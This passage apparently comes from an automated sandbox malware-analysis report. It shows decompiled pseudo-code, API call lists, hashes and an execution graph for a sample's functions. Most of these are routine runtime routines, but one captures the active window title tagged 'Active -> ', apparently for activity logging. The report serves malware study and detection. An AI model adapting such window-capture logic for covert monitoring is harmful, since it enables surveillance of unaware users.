                                                    • GetCurrentThreadId.KERNEL32 ref: 0045AF1C
                                                    • WaitMessage.USER32(00000000,0045AF60,?,?,?,0049ABD1), ref: 0045AF40
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CurrentCursorMessageThreadWait
                                                    • String ID: 4I
                                                    • API String ID: 535285469-2364942553
                                                    • Opcode ID: 1641b2bc43e08f655398654ef54c6e0fb99346d68cca38ad066637ff64216bef
                                                    • Instruction ID: 3d320c2a842818ba80bdb21166925b08477e9e3b0af4457c4c140f173818ef6e
                                                    • Opcode Fuzzy Hash: 1641b2bc43e08f655398654ef54c6e0fb99346d68cca38ad066637ff64216bef
                                                    • Instruction Fuzzy Hash: F431D670A04208EFDB01DF65C846BAEB7F5EB05305F6145BAEC00A7392D7796E58C71A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 72%
                                                    			E0040B620(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
                                                    				char _v8;
                                                    				short _v18;
                                                    				short _v22;
                                                    				struct _SYSTEMTIME _v24;
                                                    				char _v280;
                                                    				char* _t32;
                                                    				intOrPtr* _t49;
                                                    				intOrPtr _t58;
                                                    				void* _t63;
                                                    				void* _t67;
                                                    
                                                    				_v8 = 0;
                                                    				_t49 = __edx;
                                                    				_t63 = __eax;
                                                    				_push(_t67);
                                                    				_push(0x40b6fe);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t67 + 0xfffffeec;
                                                    				E004049C0(__edx);
                                                    				_v24 =  *((intOrPtr*)(_a4 - 0xe));
                                                    				_v22 =  *((intOrPtr*)(_a4 - 0x10));
                                                    				_v18 =  *((intOrPtr*)(_a4 - 0x12));
                                                    				if(_t63 > 2) {
                                                    					E00404A58( &_v8, 0x40b720);
                                                    				} else {
                                                    					E00404A58( &_v8, 0x40b714);
                                                    				}
                                                    				_t32 = E00404E80(_v8);
                                                    				if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t32,  &_v280, 0x100) != 0) {
                                                    					E00404C30(_t49, 0x100,  &_v280);
                                                    					if(_t63 == 1 &&  *((char*)( *_t49)) == 0x30) {
                                                    						E00404EE0( *_t49, E00404C80( *_t49) - 1, 2, _t49);
                                                    					}
                                                    				}
                                                    				_pop(_t58);
                                                    				 *[fs:eax] = _t58;
                                                    				_push(E0040B705);
                                                    				return E004049C0( &_v8);
                                                    			}

                                                    APIs
                                                    • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,0040B6FE), ref: 0040B6A6
                                                    • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,0040B6FE), ref: 0040B6AC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: DateFormatLocaleThread
                                                    • String ID: yyyy
                                                    • API String ID: 3303714858-3145165042
                                                    • Opcode ID: c40c53b5022c3b6d53ef6eb9169cbbe0f0549cacc423d75f4f5ec497cf9a52fc
                                                    • Instruction ID: 9bb3f367f0bbc217274b1ad28ba4a7515005ed0bbfdc0499212bfc9343ce28fe
                                                    • Opcode Fuzzy Hash: c40c53b5022c3b6d53ef6eb9169cbbe0f0549cacc423d75f4f5ec497cf9a52fc
                                                    • Instruction Fuzzy Hash: E42132B46041089BDB01EBA5C942AAE73A8EF48300F51447BF904F73D1D7789E04C7AE
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 59%
                                                    			E0042A3E8(intOrPtr __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4, char _a8, void* _a12) {
                                                    				intOrPtr _v8;
                                                    				intOrPtr _v12;
                                                    				intOrPtr _t62;
                                                    				intOrPtr _t64;
                                                    				intOrPtr _t67;
                                                    				void* _t77;
                                                    				void* _t78;
                                                    				intOrPtr _t79;
                                                    				intOrPtr _t80;
                                                    
                                                    				_t77 = _t78;
                                                    				_t79 = _t78 + 0xfffffff8;
                                                    				_v8 = __eax;
                                                    				_v12 = L00403BBC(1);
                                                    				_push(_t77);
                                                    				_push(0x42a46f);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t79;
                                                    				 *((intOrPtr*)(_v12 + 8)) = __edx;
                                                    				 *((intOrPtr*)(_v12 + 0x10)) = __ecx;
                                                    				memcpy(_v12 + 0x18, _a12, 0x15 << 2);
                                                    				_t80 = _t79 + 0xc;
                                                    				 *((char*)(_v12 + 0x70)) = _a8;
                                                    				if( *((intOrPtr*)(_v12 + 0x2c)) != 0) {
                                                    					 *((intOrPtr*)(_v12 + 0x14)) =  *((intOrPtr*)(_v12 + 8));
                                                    				}
                                                    				_t62 =  *0x418ef8; // 0x418f44
                                                    				 *((intOrPtr*)(_v12 + 0x6c)) = L00403D9C(_a4, _t62);
                                                    				_pop(_t64);
                                                    				 *[fs:eax] = _t64;
                                                    				_push(0x49e8b0);
                                                    				L00406FE0();
                                                    				_push(_t77);
                                                    				_push(0x42a4cf);
                                                    				_push( *[fs:edx]);
                                                    				 *[fs:edx] = _t80;
                                                    				E00428E70( *((intOrPtr*)(_v8 + 0x28)));
                                                    				 *((intOrPtr*)(_v8 + 0x28)) = _v12;
                                                    				E00428E6C(_v12);
                                                    				_pop(_t67);
                                                    				 *[fs:eax] = _t67;
                                                    				_push(0x42a4d6);
                                                    				_push(0x49e8b0);
                                                    				L004071A0();
                                                    				return 0;
                                                    			}

                                                    APIs
                                                    • RtlEnterCriticalSection.KERNEL32(0049E8B0), ref: 0042A48B
                                                    • RtlLeaveCriticalSection.KERNEL32(0049E8B0,0042A4D6,0049E8B0), ref: 0042A4C9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeave
                                                    • String ID: P>B
                                                    • API String ID: 3168844106-1256901731
                                                    • Opcode ID: 529a9a366aa929e4620bea5d697823ec64bf912a646acf53574e1b983412bb67
                                                    • Instruction ID: 63024a2a2f57267be46c6b4524dac06f3360d3f79ec1ca4db72fa5e9cc5c2d4b
                                                    • Opcode Fuzzy Hash: 529a9a366aa929e4620bea5d697823ec64bf912a646acf53574e1b983412bb67
                                                    • Instruction Fuzzy Hash: 77218E74B04314EFD701DF69D88188DBBF5FB48720B5281AAE844A7791D778EE90CA98
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 51%
                                                    			E004769AC(void* __ebx, void* __edx) {
                                                    				char _v8;
                                                    				char _v12;
                                                    				char _v16;
                                                    				char _v20;
                                                    				char _v24;
                                                    				int _t28;
                                                    				intOrPtr _t32;
                                                    				void* _t37;
                                                    				intOrPtr* _t45;
                                                    				struct HWND__* _t48;
                                                    				intOrPtr _t55;
                                                    				intOrPtr _t67;
                                                    
                                                    				_push(0);
                                                    				_push(0);
                                                    				_push(0);
                                                    				_push(0);
                                                    				_push(0);
                                                    				_push(_t67);
                                                    				_push(0x476a7b);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t67;
                                                    				_t48 =  *(__edx + 4);
                                                    				if(_t48 > 0) {
                                                    					E0040500C( &_v8, GetWindowTextLengthA(_t48));
                                                    					_t28 = E00404C80(_v8) + 1;
                                                    					GetWindowTextA(_t48, E00404E80(_v8), _t28);
                                                    					_t32 =  *0x49ec6c; // 0x0
                                                    					E00408FF8(_t32,  &_v12);
                                                    					_push(_v12);
                                                    					E00408FF8(_v8,  &_v16);
                                                    					_pop(_t37);
                                                    					E00404DCC(_t37, _v16);
                                                    					if(_t28 != 0) {
                                                    						E00408FF8(_v8,  &_v20);
                                                    						if(_v20 != 0) {
                                                    							E00404A14(0x49ec6c, _v8);
                                                    							E00404CCC( &_v24, _v8, "Active -> ");
                                                    							_t45 =  *0x49ec44; // 0x0
                                                    							 *0x49ec48 =  *((intOrPtr*)( *_t45 + 0x38))();
                                                    						}
                                                    					}
                                                    				}
                                                    				_pop(_t55);
                                                    				 *[fs:eax] = _t55;
                                                    				_push(0x476a82);
                                                    				return E004049E4( &_v24, 5);
                                                    			}

                                                    APIs
                                                    • GetWindowTextLengthA.USER32(?), ref: 004769D1
                                                    • GetWindowTextA.USER32 ref: 004769F4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: TextWindow$Length
                                                    • String ID: Active ->
                                                    • API String ID: 1006428111-2811066380
                                                    • Opcode ID: a34852fa71e462f670709aa45cdd9028366e921516bd4f16c1ddaa93e44f0273
                                                    • Instruction ID: d9f40d637c3a14713fae2ad8e053e9984e8428a736acad8caa5444ef25058333
                                                    • Opcode Fuzzy Hash: a34852fa71e462f670709aa45cdd9028366e921516bd4f16c1ddaa93e44f0273
                                                    • Instruction Fuzzy Hash: 7C215774600209DFD704EBA5C9829AFB3B9EF45704B61857BF505B3351DB78AE00CA68
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 64%
                                                    			E0043B290(void* __eax, void* __ebx, void* __edi, void* __esi) {
                                                    				char _v8;
                                                    				char _v12;
                                                    				char _v16;
                                                    				intOrPtr _t31;
                                                    				void* _t36;
                                                    				intOrPtr _t42;
                                                    				struct HDC__* _t47;
                                                    				void* _t50;
                                                    
                                                    				_push(__esi);
                                                    				_v16 = 0;
                                                    				_t36 = __eax;
                                                    				_push(_t50);
                                                    				_push(0x43b326);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t50 + 0xfffffff4;
                                                    				if( *((intOrPtr*)(__eax + 0x30)) == 0) {
                                                    					_v12 =  *((intOrPtr*)(__eax + 8));
                                                    					_v8 = 0xb;
                                                    					_t31 =  *0x49dc4c; // 0x422f30
                                                    					E00406A70(_t31,  &_v16);
                                                    					E0040D180(_t36, _v16, 1, __edi, __esi, 0,  &_v12);
                                                    					E00404378();
                                                    				}
                                                    				_t47 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t36 + 0x30)))) + 0x48))();
                                                    				SetViewportOrgEx(_t47,  *(_t36 + 0x40),  *(_t36 + 0x44), 0);
                                                    				IntersectClipRect(_t47, 0, 0,  *(_t36 + 0x48),  *(_t36 + 0x4c));
                                                    				_pop(_t42);
                                                    				 *[fs:eax] = _t42;
                                                    				_push(0x43b32d);
                                                    				return E004049C0( &_v16);
                                                    			}

                                                    APIs
                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0043B2F9
                                                    • IntersectClipRect.GDI32(00000000,00000000,00000000,?,?), ref: 0043B30B
                                                      • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ClipIntersectLoadRectStringViewport
                                                    • String ID: 0/B
                                                    • API String ID: 2734429277-1373906003
                                                    • Opcode ID: e2a8b772cc04bb5050f4f3461b5c500d9201bab241943ca1f0f2e8e1c857e399
                                                    • Instruction ID: e8a904d80b5f428ce4efa45f7181a255eb87ff5514a318c6dca8c784068d0644
                                                    • Opcode Fuzzy Hash: e2a8b772cc04bb5050f4f3461b5c500d9201bab241943ca1f0f2e8e1c857e399
                                                    • Instruction Fuzzy Hash: 25112E71A04204AFDB04DF99DC91FAE77A8EB49304F5040BAFE00EB291DB75AD00CB99
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E0043B338(void* __eflags, intOrPtr _a4) {
                                                    				char _v5;
                                                    				struct tagRECT _v21;
                                                    				struct tagRECT _v40;
                                                    				void* _t40;
                                                    				void* _t45;
                                                    
                                                    				_v5 = 1;
                                                    				_t44 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198));
                                                    				_t45 = E0041ACC8( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198)),  *((intOrPtr*)(_a4 - 4)));
                                                    				if(_t45 <= 0) {
                                                    					L5:
                                                    					_v5 = 0;
                                                    				} else {
                                                    					do {
                                                    						_t45 = _t45 - 1;
                                                    						_t40 = E0041AC6C(_t44, _t45);
                                                    						if( *((char*)(_t40 + 0x57)) == 0 || ( *(_t40 + 0x50) & 0x00000040) == 0) {
                                                    							goto L4;
                                                    						} else {
                                                    							E0043A91C(_t40,  &_v40);
                                                    							IntersectRect( &_v21, _a4 + 0xffffffec,  &_v40);
                                                    							if(EqualRect( &_v21, _a4 + 0xffffffec) == 0) {
                                                    								goto L4;
                                                    							}
                                                    						}
                                                    						goto L6;
                                                    						L4:
                                                    					} while (_t45 > 0);
                                                    					goto L5;
                                                    				}
                                                    				L6:
                                                    				return _v5;
                                                    			}

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Rect$EqualIntersect
                                                    • String ID: @
                                                    • API String ID: 3291753422-2766056989
                                                    • Opcode ID: 3dbe96d5647e64b59e77b546ad2791974d62cec345338b82838d99b1a4952e45
                                                    • Instruction ID: ff87b59c4918c05e59a4b882000aa20bb8e2e27f5e52085d9b15fe210c2257fb
                                                    • Opcode Fuzzy Hash: 3dbe96d5647e64b59e77b546ad2791974d62cec345338b82838d99b1a4952e45
                                                    • Instruction Fuzzy Hash: 8E118C31A042585BC711DA6DC889BDF7BE8AF49328F044296FD04EB382D779ED0587D5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 55%
                                                    			E0042F680(void* __eax, void* __ebx, void* __ecx, void* __esi) {
                                                    				char _v8;
                                                    				intOrPtr _t18;
                                                    				void* _t23;
                                                    				intOrPtr _t28;
                                                    				int _t32;
                                                    				intOrPtr _t35;
                                                    
                                                    				_push(0);
                                                    				_t23 = __eax;
                                                    				_push(_t35);
                                                    				_push(0x42f6ff);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t35;
                                                    				KillTimer( *(__eax + 0x34), 1);
                                                    				_t32 =  *(_t23 + 0x30);
                                                    				if(_t32 != 0 &&  *((char*)(_t23 + 0x40)) != 0 &&  *((short*)(_t23 + 0x3a)) != 0 && SetTimer( *(_t23 + 0x34), 1, _t32, 0) == 0) {
                                                    					_t18 =  *0x49de08; // 0x422f68
                                                    					E00406A70(_t18,  &_v8);
                                                    					E0040D144(_v8, 1);
                                                    					E00404378();
                                                    				}
                                                    				_pop(_t28);
                                                    				 *[fs:eax] = _t28;
                                                    				_push(0x42f706);
                                                    				return E004049C0( &_v8);
                                                    			}

                                                    APIs
                                                    • KillTimer.USER32(?,00000001,00000000,0042F6FF,?,?,?,00000000), ref: 0042F69D
                                                    • SetTimer.USER32 ref: 0042F6BF
                                                      • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Timer$KillLoadString
                                                    • String ID: h/B
                                                    • API String ID: 1423459280-860576603
                                                    • Opcode ID: 529066ee03a2b6d127a9d6b04acc1eb89f9b5d8459c0dc1aaa59090bcc4611f3
                                                    • Instruction ID: c638335ebb45f94185b8bc64c2a04c90921daa6f7a9a6c3e75923d264c20285e
                                                    • Opcode Fuzzy Hash: 529066ee03a2b6d127a9d6b04acc1eb89f9b5d8459c0dc1aaa59090bcc4611f3
                                                    • Instruction Fuzzy Hash: C601B571B04210ABDB10EB61DC92F5A37BCDB45708FD1007AFD00AB2D2D7B9AC44C658
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 68%
                                                    			E0042C794(intOrPtr _a4, intOrPtr _a8, signed int _a12) {
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				void* __ebp;
                                                    				void* _t15;
                                                    				void* _t16;
                                                    				intOrPtr _t18;
                                                    				signed int _t19;
                                                    				void* _t20;
                                                    				intOrPtr _t21;
                                                    
                                                    				_t19 = _a12;
                                                    				if( *0x49e92b != 0) {
                                                    					_t16 = 0;
                                                    					if((_t19 & 0x00000003) != 0) {
                                                    						L7:
                                                    						_t16 = 0x12340042;
                                                    					} else {
                                                    						_t21 = _a4;
                                                    						if(_t21 >= 0 && _t21 < GetSystemMetrics(0) && _a8 >= 0 && GetSystemMetrics(1) > _a8) {
                                                    							goto L7;
                                                    						}
                                                    					}
                                                    				} else {
                                                    					_t18 =  *0x49e90c; // 0x42c794
                                                    					 *0x49e90c = E0042C4FC(3, _t15, _t18, _t19, _t20);
                                                    					_t16 =  *0x49e90c(_a4, _a8, _t19);
                                                    				}
                                                    				return _t16;
                                                    			}

                                                    APIs
                                                    • GetSystemMetrics.USER32 ref: 0042C7E2
                                                    • GetSystemMetrics.USER32 ref: 0042C7F4
                                                      • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(768F0000,00000000), ref: 0042C57C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MetricsSystem$AddressProc
                                                    • String ID: MonitorFromPoint
                                                    • API String ID: 1792783759-1072306578
                                                    • Opcode ID: 6cdc29a5e44f7e0585e2ae4c63b37bf951fe99bc70721fab0bf04256813ce94d
                                                    • Instruction ID: 3a8d409507ccd0e879ce772a810bcfc943f8b0dcea0ef563c0c7703c31a9de97
                                                    • Opcode Fuzzy Hash: 6cdc29a5e44f7e0585e2ae4c63b37bf951fe99bc70721fab0bf04256813ce94d
                                                    • Instruction Fuzzy Hash: 3201A271301128AFDB10AF56ECC8B5EBB55EB90366FC0C037F9059B251C378AC008B68
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 68%
                                                    			E0042C66C(intOrPtr* _a4, signed int _a8) {
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				void* __ebp;
                                                    				intOrPtr* _t14;
                                                    				intOrPtr _t16;
                                                    				signed int _t17;
                                                    				void* _t18;
                                                    				void* _t19;
                                                    
                                                    				_t17 = _a8;
                                                    				_t14 = _a4;
                                                    				if( *0x49e92a != 0) {
                                                    					_t19 = 0;
                                                    					if((_t17 & 0x00000003) != 0 ||  *((intOrPtr*)(_t14 + 8)) > 0 &&  *((intOrPtr*)(_t14 + 0xc)) > 0 && GetSystemMetrics(0) >  *_t14 && GetSystemMetrics(1) >  *((intOrPtr*)(_t14 + 4))) {
                                                    						_t19 = 0x12340042;
                                                    					}
                                                    				} else {
                                                    					_t16 =  *0x49e908; // 0x42c66c
                                                    					 *0x49e908 = E0042C4FC(2, _t14, _t16, _t17, _t18);
                                                    					_t19 =  *0x49e908(_t14, _t17);
                                                    				}
                                                    				return _t19;
                                                    			}

                                                    Instruction addresses: 0x0042c672 0x0042c675 0x0042c67f 0x0042c6a4 0x0042c6ad 0x0042c6d4 0x0042c6d4 0x0042c681 0x0042c686 0x0042c693 0x0042c6a0 0x0042c6a0 0x0042c6df

                                                    APIs
                                                    • GetSystemMetrics.USER32 ref: 0042C6BD
                                                    • GetSystemMetrics.USER32 ref: 0042C6C9
                                                      • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(768F0000,00000000), ref: 0042C57C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MetricsSystem$AddressProc
                                                    • String ID: MonitorFromRect
                                                    • API String ID: 1792783759-4033241945
                                                    • Opcode ID: 0505ff08604382a2a7a56eddc592a15d0ad7eb215b3b37d6f2a53d4f1b45624d
                                                    • Instruction ID: ff17a17d24a28b56e0f59b29e5112e5d3ba35734792e5f6c57e17e57efd49fd6
                                                    • Opcode Fuzzy Hash: 0505ff08604382a2a7a56eddc592a15d0ad7eb215b3b37d6f2a53d4f1b45624d
                                                    • Instruction Fuzzy Hash: 1601A771301128ABD760CB05F8C9B1A7755E764361F845077E805CB246C778EC40CBAC
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E0044AE70(void* __eax, void* __edi, void* __esi) {
                                                    				void* _t16;
                                                    				intOrPtr _t17;
                                                    				void* _t18;
                                                    				void* _t19;
                                                    
                                                    				_t19 = __esi;
                                                    				_t18 = __edi;
                                                    				_t16 = __eax;
                                                    				if( *((intOrPtr*)(__eax + 0x34)) == 0) {
                                                    					_t17 =  *0x449b38; // 0x449b84
                                                    					if(L00403D78( *((intOrPtr*)(__eax + 4)), _t17) == 0) {
                                                    						 *((intOrPtr*)(_t16 + 0x34)) = CreateMenu();
                                                    					} else {
                                                    						 *((intOrPtr*)(_t16 + 0x34)) = CreatePopupMenu();
                                                    					}
                                                    					if( *((intOrPtr*)(_t16 + 0x34)) == 0) {
                                                    						L00449F18();
                                                    					}
                                                    					E0044AC00(_t16, _t18, _t19);
                                                    				}
                                                    				return  *((intOrPtr*)(_t16 + 0x34));
                                                    			}

                                                    Instruction addresses: 0x0044ae70 0x0044ae70 0x0044ae71 0x0044ae77 0x0044ae7c 0x0044ae89 0x0044ae9a 0x0044ae8b 0x0044ae90 0x0044ae90 0x0044aea1 0x0044aea8 0x0044aea8 0x0044aeaf 0x0044aeaf 0x0044aeb8

                                                    APIs
                                                    • CreatePopupMenu.USER32(?,0044AB77,00000000,00000000,0044ABBB), ref: 0044AE8B
                                                    • CreateMenu.USER32(?,0044AB77,00000000,00000000,0044ABBB), ref: 0044AE95
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateMenu$Popup
                                                    • String ID: .B
                                                    • API String ID: 257293969-2011479308
                                                    • Opcode ID: 0806c6a46482751433e2ade30357662471cd1d52e2604d1811d61facdbb405b4
                                                    • Instruction ID: ec3ec204bd3e4010e8879658da88cb666e7af430c2d7f16cc051fc7c4e83f06b
                                                    • Opcode Fuzzy Hash: 0806c6a46482751433e2ade30357662471cd1d52e2604d1811d61facdbb405b4
                                                    • Instruction Fuzzy Hash: BFE06D306822008FEB50EF65DAC564A3BA8AF05309F9034BAA8119F347C738DC958B5A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Execution Graph

                                                    Execution Coverage: 9.8%
                                                    Dynamic/Decrypted Code Coverage: 0%
                                                    Signature Coverage: 1.5%
                                                    Total number of Nodes: 1417
                                                    Total number of Limit Nodes: 72
                                                    execution_graph 5768 3c3db7 TlsAlloc 5362 3c1330 5363 3c133a GetProcAddress 5362->5363 5364 3c1334 5362->5364 5366 3c135b 5363->5366 5367 3c1354 5363->5367 5365 3c2e90 66 API calls 5364->5365 5365->5363 5369 3c1eb0 85 API calls 5366->5369 5368 3c2e90 66 API calls 5367->5368 5368->5366 5370 3c1360 EnumResourceNamesA FreeLibrary 5369->5370 5769 3c52b0 5770 3c52c2 5769->5770 5772 3c52d0 @_EH4_CallFilterFunc@8 5769->5772 5771 3c2701 __NMSG_WRITE 5 API calls 5770->5771 5771->5772 5402 3c302e 5403 3c4882 __calloc_crt 66 API calls 5402->5403 5404 3c303a EncodePointer 5403->5404 5405 3c3053 5404->5405 5409 3c7924 5412 3c78d2 __CallSettingFrame@12 5409->5412 5410 3c7939 5423 3c795e 5410->5423 5412->5410 5417 3c3971 5412->5417 5415 3c794f __setmbcp 5416 3c3971 ___FrameUnwindToState 69 API calls 5416->5415 5428 3c4440 5417->5428 5419 3c397d DecodePointer 5420 3c398d 5419->5420 5429 3c3925 5420->5429 5424 3c3f5e __getptd 66 API calls 5423->5424 5425 3c7963 5424->5425 5426 3c7945 5425->5426 5427 3c3f5e __getptd 66 API calls 5425->5427 5426->5415 5426->5416 5427->5426 5428->5419 5430 3c3931 __setmbcp 5429->5430 5431 3c3f5e __getptd 66 API calls 5430->5431 5433 3c3936 5431->5433 5435 3c5372 5433->5435 5444 3c3a0f DecodePointer 5435->5444 5437 3c5377 5439 3c5382 5437->5439 5445 3c3a1c 5437->5445 5440 3c3bec __call_reportfault 8 API calls 5439->5440 5442 3c539a 5439->5442 5440->5442 5441 3c2ea6 _abort 66 API calls 5443 3c53a4 5441->5443 5442->5441 5444->5437 5449 3c3a28 __setmbcp 5445->5449 5446 3c3a83 5447 3c3a65 DecodePointer 5446->5447 5452 3c3a92 5446->5452 5453 3c3a54 _siglookup 5447->5453 5448 3c3a4f 5450 3c3ee5 __getptd_noexit 66 API calls 5448->5450 5449->5446 5449->5447 5449->5448 5455 3c3a4b 5449->5455 5450->5453 5454 3c4264 __setmbcp 66 API calls 5452->5454 5456 3c3aef 5453->5456 5458 3c2ea6 _abort 66 API calls 5453->5458 5465 3c3a5d __setmbcp 5453->5465 5457 3c3a97 5454->5457 5455->5448 5455->5452 5460 3c38f2 __lock 66 
API calls 5456->5460 5462 3c3afa 5456->5462 5459 3c3d67 _raise 11 API calls 5457->5459 5458->5456 5459->5465 5460->5462 5463 3c3b2f 5462->5463 5466 3c3dae RtlEncodePointer 5462->5466 5467 3c3b83 5463->5467 5465->5439 5466->5463 5468 3c3b89 5467->5468 5469 3c3b90 5467->5469 5471 3c3819 LeaveCriticalSection 5468->5471 5469->5465 5471->5469 5773 3c75a5 5774 3c2701 __NMSG_WRITE 5 API calls 5773->5774 5775 3c75bb 5774->5775 5776 3c83b3 ___InternalCxxFrameHandler 71 API calls 5775->5776 5781 3c75c6 5775->5781 5777 3c75fe 5776->5777 5778 3c7615 5777->5778 5782 3c7411 RtlUnwind 5777->5782 5780 3c74ce _CallSETranslator 66 API calls 5778->5780 5780->5781 5782->5778 5783 3c44a0 5784 3c44cc 5783->5784 5785 3c44d9 5783->5785 5786 3c2701 __NMSG_WRITE 5 API calls 5784->5786 5787 3c2701 __NMSG_WRITE 5 API calls 5785->5787 5786->5785 5796 3c44e9 __except_handler4 __IsNonwritableInCurrentImage 5787->5796 5788 3c456c 5789 3c4542 __except_handler4 5789->5788 5790 3c455c 5789->5790 5791 3c2701 __NMSG_WRITE 5 API calls 5789->5791 5792 3c2701 __NMSG_WRITE 5 API calls 5790->5792 5791->5790 5792->5788 5794 3c45be __except_handler4 5795 3c45f2 5794->5795 5797 3c2701 __NMSG_WRITE 5 API calls 5794->5797 5798 3c2701 __NMSG_WRITE 5 API calls 5795->5798 5796->5788 5796->5789 5799 3c5342 RtlUnwind 5796->5799 5797->5795 5798->5789 5799->5794 5472 3c321e 5473 3c322d 5472->5473 5474 3c3233 5472->5474 5475 3c2ea6 _abort 66 API calls 5473->5475 5478 3c2ecb 5474->5478 5475->5474 5477 3c3238 __setmbcp 5479 3c2d50 _doexit 66 API calls 5478->5479 5480 3c2ed6 5479->5480 5480->5477 5803 3c7b98 5804 3c3f5e __getptd 66 API calls 5803->5804 5805 3c7ba0 5804->5805 5806 3c789c ___FrameUnwindToState 69 API calls 5805->5806 5807 3c7bf0 5806->5807 5808 3c7c25 FindHandlerForForeignException 66 API calls 5807->5808 5809 3c7c11 __setmbcp 5808->5809 5810 3c8598 5811 3c2701 __NMSG_WRITE 5 API calls 5810->5811 5812 3c85ac 5811->5812 5813 3c2701 __NMSG_WRITE 5 API calls 5812->5813 5814 3c85b6 5813->5814 5481 3c791a 5484 
